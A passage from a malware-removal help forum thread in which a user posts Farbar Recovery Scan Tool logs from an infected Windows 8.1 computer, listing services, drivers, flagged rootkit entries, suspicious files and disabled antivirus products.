CHR Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2017-06-10]

CHR Extension: (Trevx - Music Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmaepaboafhefdejcbiciklgjogoghf [2016-05-15]

CHR Extension: (Google Docs Offline) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-03]

CHR Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjnegcaeklhafolokijcfjliaokphfk [2016-12-20]

CHR Extension: (Video Converter) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcjjnhgakghmggnimjkldjmmpabhnhne [2016-03-08]

CHR Extension: (Chrome Web Store Payments) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]

CHR Extension: (Image Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\oeofhjjmgagmjigkfgghbnjjeibokcik [2016-11-22]

CHR Extension: (Notifications for Instagram) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\opnbmdkdflhjiclaoiiifmheknpccalb [2018-01-15]

CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]

CHR Extension: (Adobe HDS / HLS Video Saver) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pibndofbpkoaipoidbkephfhhnapkccn [2018-03-08]

CHR Extension: (Gmail) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-04-03]

CHR Extension: (Chrome Media Router) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-03-22]

CHR Extension: (Instagram) - C:\Program File (x86) ArcWelder - Android Simulator (Google Chrome) - Instagram\com.instagram.android.apk_export_eznre [2016-03-13]

CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile [2018-05-29]

CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]

CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx

CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx

CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx

 

==================== Services (Whitelisted) ====================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

HKLM\SYSTEM\CurrentControlSet\Services\eubtvna <==== ATTENTION (Rootkit!)

 

S2 6320c4d4d9492959f6f8b43b8fdbf2f5; C:\Program Files\6320c4d4d9492959f6f8b43b8fdbf2f5\890117e400ab1707a9d681317614c87e.exe [1795584 2018-03-22] () [File not signed] <==== ATTENTION

R2 9b2582d4a23748e2d93e755c9fbf7de5; C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll [2150400 2018-03-22] () [File not signed]

R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-08-24] (Adobe Systems Incorporated)

R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2021056 2016-03-03] (Adobe Systems, Incorporated)

R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe [71680 2014-02-25] (ASUS Cloud Corporation) [File not signed]

S2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [5817256 2016-07-10] (COMODO)

S3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2271928 2016-07-10] (COMODO)

R2 dahhService; C:\ProgramData\dahhService\dahhService.exe [369872 2018-03-22] ()

R2 gramblrclient; C:\Program Files\Gramblr\gramblr.exe [12021840 2018-03-07] () [File not signed]

S4 gzserv; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\gzserv.exe [79552 2018-03-08] (Bitdefender)

R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel® Corporation) [File not signed]

S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel® Corporation)

S2 MBAMService; C:\Program File (x86) Malwarebytes Anti-Malware - VER. 2-B\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)

S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-02-28] (Riverbed Technology, Inc.)

R2 sesvc; C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe [9216 2011-01-02] (www.shadowexplorer.com) [File not signed]

S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2014-09-21] (Microsoft Corporation)

S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2014-09-21] (Microsoft Corporation)

S2 GamesAppIntegrationService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe" [X]

S3 GamesAppService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe" [X]

S4 windowsmanagementservice; windowsmanagementservice [X] <==== ATTENTION

 

===================== Drivers (Whitelisted) ======================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

R1 6bbfa1b48d3fadbf9e2e973e703b29a9; C:\Windows\system32\drivers\6bbfa1b48d3fadbf9e2e973e703b29a9.sys [79776 2018-03-22] ()

R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3892224 2014-03-07] (Qualcomm Atheros Communications, Inc.)

R3 ATP; C:\Windows\System32\drivers\AsusTP.sys [71952 2014-03-31] (ASUS Corporation)

R0 avc3; C:\Windows\System32\DRIVERS\avc3.sys [718840 2013-04-17] (BitDefender)

U5 avchv; C:\Windows\System32\Drivers\avchv.sys [261056 2016-03-06] (BitDefender)

S3 avckf; C:\Windows\System32\DRIVERS\avckf.sys [593144 2013-04-17] (BitDefender)

R1 bdfwfpf; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\bdfwfpf.sys [121928 2013-07-02] (Bitdefender SRL)

R1 cmderd; C:\Windows\System32\DRIVERS\cmderd.sys [32224 2016-07-10] (COMODO)

R1 cmdGuard; C:\Windows\System32\DRIVERS\cmdguard.sys [851864 2016-07-10] (COMODO)

R1 cmdhlp; C:\Windows\system32\DRIVERS\cmdhlp.sys [45600 2016-07-10] (COMODO)

R1 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [148696 2013-04-22] (BitDefender LLC)

R1 inspect; C:\Windows\system32\DRIVERS\inspect.sys [138568 2016-07-10] (COMODO)

R3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [17280 2012-08-05] ( )

R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)

S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)

R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2013-10-27] (Intel Corporation)

S3 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-02-28] (Riverbed Technology, Inc.)

R3 TotRec8; C:\Windows\system32\drivers\TotRec8.sys [125640 2014-04-30] (High Criteria inc.)

U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [24688 2017-06-09] ()

R0 trufos; C:\Windows\System32\DRIVERS\trufos.sys [382536 2013-05-28] (BitDefender S.R.L.)

R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)

R3 VASDeviceDrm; C:\Windows\system32\drivers\vasdDev.sys [1454896 2012-03-19] (ShiningMorning Inc.)

R0 vsock; C:\Windows\System32\drivers\vsock.sys [73296 2013-10-08] (VMware, Inc.)

S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2014-09-21] (Microsoft Corporation)

S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2014-09-21] (Microsoft Corporation)

S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2014-09-21] (Microsoft Corporation)

S4 hrlvm; System32\drivers\usbcmpvz.sys [X]

R3 knquxa; system32\drivers\qtxadh.sys [X]

 

==================== NetSvcs (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

 

==================== One Month Created files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2018-06-04 20:57 - 2018-06-04 21:02 - 000006438 _____ C:\Users\Dan\Desktop\Fixlog.txt

2018-06-04 20:46 - 2018-06-04 20:46 - 000000000 ____D C:\Users\Dan\AppData\Local\upmrihe

2018-06-04 20:42 - 2018-06-04 20:42 - 000142672 ____N C:\Windows\system32\Drivers\cooorvyb.sys

2018-06-04 20:15 - 2018-06-04 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\widgtzk

2018-06-03 22:43 - 2018-06-03 22:43 - 000000077 _____ C:\Users\Dan\AppData\Local\smplayerhdpi.ini

2018-06-03 20:18 - 2018-06-03 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\msapgde

2018-06-02 19:42 - 2018-06-02 19:42 - 000000000 ____D C:\Users\Dan\AppData\Local\reepcgo

2018-06-01 20:21 - 2018-06-01 20:21 - 000000000 ____D C:\Users\Dan\AppData\Local\wmkxhrt

2018-05-31 20:50 - 2018-05-31 20:51 - 000074625 _____ C:\Users\Dan\Desktop\Addition.txt

2018-05-31 20:48 - 2018-06-04 21:05 - 000022309 _____ C:\Users\Dan\Desktop\FRST.txt

2018-05-31 20:46 - 2018-05-31 19:26 - 002413056 _____ (Farbar) C:\Users\Dan\Desktop\FRST64.exe

2018-05-31 20:24 - 2018-05-31 20:24 - 000000000 ____D C:\Users\Dan\AppData\Local\sinxrlt

2018-05-30 20:20 - 2018-05-30 20:20 - 000000000 ____D C:\Users\Dan\AppData\Local\mbiczhw

2018-05-29 20:47 - 2018-05-29 21:04 - 000003084 _____ C:\Windows\System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A}

2018-05-29 20:16 - 2018-05-29 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\avcsxeg

2018-05-28 20:16 - 2018-05-28 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\dtiroaw

2018-05-27 20:40 - 2018-05-27 20:40 - 000000146 _____ C:\Users\Dan\Desktop\Windows Defender - Shortcut.lnk

2018-05-27 20:12 - 2018-05-27 20:12 - 000000000 ____D C:\Users\Dan\AppData\Local\vdmbsup

2018-05-26 19:39 - 2018-05-26 19:39 - 000000000 ____D C:\Users\Dan\AppData\Local\cgkeslp

2018-05-25 20:18 - 2018-05-25 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\nimzwrx

2018-05-24 20:16 - 2018-05-24 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\svhznix

2018-05-23 23:10 - 2018-05-23 23:10 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf

2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ C:\Users\Dan\AppData\Local\recently-used.xbel

2018-05-23 20:16 - 2018-05-23 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\coeaubg

2018-05-22 20:15 - 2018-05-22 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\lsrgdch

2018-05-21 18:54 - 2018-05-21 18:54 - 000000000 ____D C:\Users\Dan\AppData\Local\tihexad

2018-05-20 19:05 - 2018-05-20 19:05 - 000000000 ____D C:\Users\Dan\AppData\Local\rtksgep

2018-05-19 19:36 - 2018-05-19 19:36 - 000000000 ____D C:\Users\Dan\AppData\Local\usbziol

2018-05-18 20:19 - 2018-05-18 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\mskiwue

2018-05-17 20:18 - 2018-05-17 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\wictgzl

2018-05-16 20:14 - 2018-05-16 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\scdhbzo

2018-05-15 20:14 - 2018-05-15 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\dwczukm

2018-05-14 20:11 - 2018-05-14 20:11 - 000000000 ____D C:\Users\Dan\AppData\Local\wihnxoc

2018-05-13 20:26 - 2018-05-13 20:26 - 000000000 ____D C:\Users\Dan\AppData\Local\dwockil

2018-05-12 19:41 - 2018-05-12 19:41 - 000000000 ____D C:\Users\Dan\AppData\Local\csdhnlo

2018-05-11 20:22 - 2018-05-11 20:22 - 000000000 ____D C:\Users\Dan\AppData\Local\coiblsg

2018-05-10 20:22 - 2018-05-10 20:22 - 000000000 ____D C:\Users\Dan\AppData\Local\widxtlb

2018-05-09 20:13 - 2018-05-09 20:13 - 000000000 ____D C:\Users\Dan\AppData\Local\seagduw

2018-05-08 20:41 - 2018-05-08 20:41 - 000000000 ____D C:\Users\Dan\AppData\Local\vdngxtz

2018-05-07 20:13 - 2018-05-07 20:13 - 000000000 ____D C:\Users\Dan\AppData\Local\nibrvwa

2018-05-06 22:10 - 2018-05-06 22:10 - 000838852 _____ C:\Users\Dan\Documents\gwyneth_paltrow_27c1e.xcf

2018-05-06 20:19 - 2018-05-06 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\pcbgxvh

2018-05-05 19:18 - 2018-05-05 19:18 - 000000000 ____D C:\Users\Dan\AppData\Local\wmeapzk

 

==================== One Month Modified files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2018-06-04 21:04 - 2016-03-03 14:05 - 000000000 ____D C:\FRST

2018-06-04 20:59 - 2018-03-22 21:52 - 000000004 _____ C:\ProgramData\lock.dat

2018-06-04 20:52 - 2017-03-29 19:14 - 000000074 _____ C:\Users\Dan\AppData\Roaming\sp_data.sys

2018-06-04 20:48 - 2015-11-12 20:24 - 000000000 ____D C:\ProgramData\VMware

2018-06-04 20:48 - 2015-02-09 00:09 - 000000000 __RDO C:\Users\Dan\OneDrive

2018-06-04 20:48 - 2015-02-01 10:08 - 000000000 ____D C:\Users\Dan\AppData\Local\Adobe

2018-06-04 20:46 - 2018-03-22 21:53 - 000000000 ____D C:\Users\Dan\AppData\Local\aucozre

2018-06-04 20:46 - 2018-03-22 21:52 - 000000312 _____ C:\ProgramData\rwi.hhad

2018-06-04 20:45 - 2015-11-13 20:19 - 000000000 ____D C:\ProgramData\Gramblr

2018-06-04 20:45 - 2013-08-22 10:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT

2018-06-04 20:44 - 2018-03-22 21:52 - 002888704 _____ (TOSHIBA CORPORATION) C:\Windows\system32\avmhengsvc.exe

2018-06-04 20:43 - 2013-08-22 09:25 - 012582912 _____ C:\Windows\system32\config\HARDWARE

2018-06-03 22:43 - 2016-06-12 19:00 - 000000000 ____D C:\Users\Dan\.smplayer

2018-06-02 21:58 - 2016-07-05 19:49 - 000000000 ____D C:\ProgramData\boost_interprocess

2018-06-02 21:19 - 2015-02-03 07:57 - 000000000 ____D C:\Users\Dan\AppData\Local\ocenaudio

2018-05-31 20:45 - 2016-07-18 13:30 - 000000000 ____D C:\Users\Dan\Desktop\Video & Various  Software Shortcuts

2018-05-29 22:18 - 2018-03-24 18:39 - 000000000 ____D C:\Users\Dan\AppData\Local\ElevatedDiagnostics

2018-05-29 22:17 - 2013-08-22 09:36 - 000000000 ____D C:\Windows\Inf

2018-05-29 21:19 - 2017-01-25 19:42 - 000000000 ____D C:\Windows\Minidump

2018-05-29 21:19 - 2016-03-07 20:08 - 000000000 ____D C:\Users\Dan\AppData\Local\CrashDumps

2018-05-29 21:04 - 2018-03-22 21:50 - 000003626 _____ C:\Windows\System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B}

2018-05-29 21:04 - 2018-03-22 21:50 - 000003424 _____ C:\Windows\System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3}

2018-05-29 21:04 - 2016-06-16 10:58 - 000003030 _____ C:\Windows\System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3}

2018-05-29 21:04 - 2015-02-11 20:37 - 000003378 _____ C:\Windows\System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8}

2018-05-29 21:04 - 2015-02-11 20:32 - 000003286 _____ C:\Windows\System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF}

2018-05-29 20:47 - 2018-03-22 21:51 - 000000000 ____D C:\Program Files (x86)\s5

2018-05-29 20:36 - 2013-08-22 11:36 - 000000000 ____D C:\Windows\system32\NDF

2018-05-28 23:34 - 2013-08-22 09:25 - 000524288 ___SH C:\Windows\system32\config\BBI

2018-05-24 20:30 - 2014-03-18 05:47 - 001164886 _____ C:\Windows\system32\PerfStringBackup.INI

2018-05-23 21:13 - 2016-07-10 13:03 - 000000000 ____D C:\Users\Dan\AppData\Local\gtk-2.0

2018-05-23 21:13 - 2015-02-04 11:43 - 000000000 ____D C:\Users\Dan\.gimp-2.8

2018-05-16 00:00 - 2015-02-05 08:20 - 000000000 ____D C:\Users\Dan\AppData\Roaming\vlc

 

==================== Files in the root of some directories =======

 

2018-03-22 21:52 - 2018-06-04 20:59 - 000000004 _____ () C:\ProgramData\lock.dat

2018-03-23 18:46 - 2018-03-23 18:46 - 000267264 _____ () C:\ProgramData\TeamVieverService.dll

1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\pAuZbg.exe

1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\YuIeaAuVrYQ.exe

2018-03-22 21:50 - 2018-03-22 21:50 - 000481104 _____ (DriverPack) C:\Users\Dan\AppData\Roaming\DRP.exe

2017-03-29 19:14 - 2018-06-04 20:52 - 000000074 _____ () C:\Users\Dan\AppData\Roaming\sp_data.sys

2018-03-22 21:49 - 2018-03-22 21:49 - 000724992 _____ () C:\Users\Dan\AppData\Roaming\virtualexechange.exe

2018-03-22 21:49 - 2018-03-22 21:49 - 000000001 _____ () C:\Users\Dan\AppData\Roaming\w.txt

2015-02-02 09:28 - 2015-02-03 07:25 - 000000068 _____ () C:\Users\Dan\AppData\Roaming\WB.CFG

2015-01-25 12:12 - 2016-03-06 16:31 - 000000365 _____ () C:\Users\Dan\AppData\Roaming\WPLAEHX

2015-04-29 13:39 - 2015-04-29 13:39 - 000200331 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS

2015-04-29 13:39 - 2015-04-29 13:39 - 000000290 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS.part

2015-04-29 13:34 - 2015-04-29 13:34 - 000385602 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS

2015-04-29 13:34 - 2015-04-29 13:38 - 000000220 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS.part

2015-04-29 13:39 - 2015-04-29 13:39 - 000146145 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS

2015-04-29 13:39 - 2015-04-29 13:39 - 000000274 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS.part

1623-04-04 13:03 - 1623-04-04 13:03 - 000192512 ____N (Microsoft Corporation) C:\Users\Dan\AppData\Local\agjCu.exe

2015-09-05 13:42 - 2016-04-20 16:08 - 000017920 _____ () C:\Users\Dan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ () C:\Users\Dan\AppData\Local\recently-used.xbel

2018-06-03 22:43 - 2018-06-03 22:43 - 000000077 _____ () C:\Users\Dan\AppData\Local\smplayerhdpi.ini

2018-03-22 21:50 - 2018-03-22 21:50 - 000000003 _____ () C:\Users\Dan\AppData\Local\wbem.ini

 

==================== Bamital & volsnap ======================

 

(There is no automatic fix for files that do not pass verification.)

 

C:\Windows\system32\winlogon.exe => File is digitally signed

C:\Windows\system32\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\system32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\system32\services.exe => File is digitally signed

C:\Windows\system32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\system32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\system32\rpcss.dll => File is digitally signed

C:\Windows\system32\dnsapi.dll => File is digitally signed

C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed

C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

C:\Windows\system32\drivers\cooorvyb.sys -> Access Denied <======= ATTENTION

 

LastRegBack: 2018-05-29 22:18

 

==================== End of FRST.txt ============================



#14 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:08:03 AM

Posted 05 June 2018 - 11:26 AM

Here's the Fxlog.txt

 

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01

Ran by Dan (04-06-2018 21:01:59) Run:9

Running from C:\Users\Dan\Desktop

Loaded Profiles: Dan (Available Profiles: Dan)

Boot Mode: Normal

==============================================

 

fixlist content:

*****************



#15 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:08:03 AM

Posted 05 June 2018 - 11:29 AM

Here's the Addition.txt

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01

Ran by Dan (04-06-2018 21:07:21)

Running from C:\Users\Dan\Desktop

Windows 8.1 Connected (Update) (X64) (2015-01-30 09:55:12)

Boot Mode: Normal

==========================================================

 

 

==================== Accounts: =============================

 

Administrator (S-1-5-21-1066246007-1091995785-1061003623-500 - Administrator - Disabled)

Dan (S-1-5-21-1066246007-1091995785-1061003623-1001 - Administrator - Enabled) => C:\Users\Dan

Guest (S-1-5-21-1066246007-1091995785-1061003623-501 - Limited - Disabled)

 

==================== Security Center ========================

 

(If an entry is included in the fixlist, it will be removed.)

 

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AV: Bitdefender Antivirus Free Edition (Disabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}

AS: Bitdefender Antivirus Free Edition (Disabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}

AS: Comodo Defense+ (Disabled - Up to date) {6BAD9487-8DE8-D130-293E-C6A728B4104F}

AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

FW: COMODO Firewall (Disabled) {E8F7F446-E1BD-DFE6-38D1-54E0ADE01D89}

 

==================== Installed Programs ======================

 

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 

4K Video Downloader 4.4 (HKLM-x32\...\{CAB406EC-AF92-417D-9BBB-B2ECE1BC7BA6}) (Version: 4.4.2.2255 - Open Media LLC)

7-Zip (HKLM\...\{F43D5365-6E1C-4A2B-BE51-E16D9554FB1D}) (Version: 9.2.0 - 7-Zip) Hidden

7-Zip (HKLM-x32\...\7-Zip 9.2.0) (Version: 9.2.0 - 7-Zip)

Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)

Adobe After Effects CC 2015.3 (HKLM-x32\...\AEFT_13_8_0) (Version: 13.8.0 - Adobe Systems Incorporated)

Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.8.0.310 - Adobe Systems Incorporated)

Adobe Media Encoder CC 2015.3 (HKLM-x32\...\AME_10_3_0) (Version: 10.3.0 - Adobe Systems Incorporated)

Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)






1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users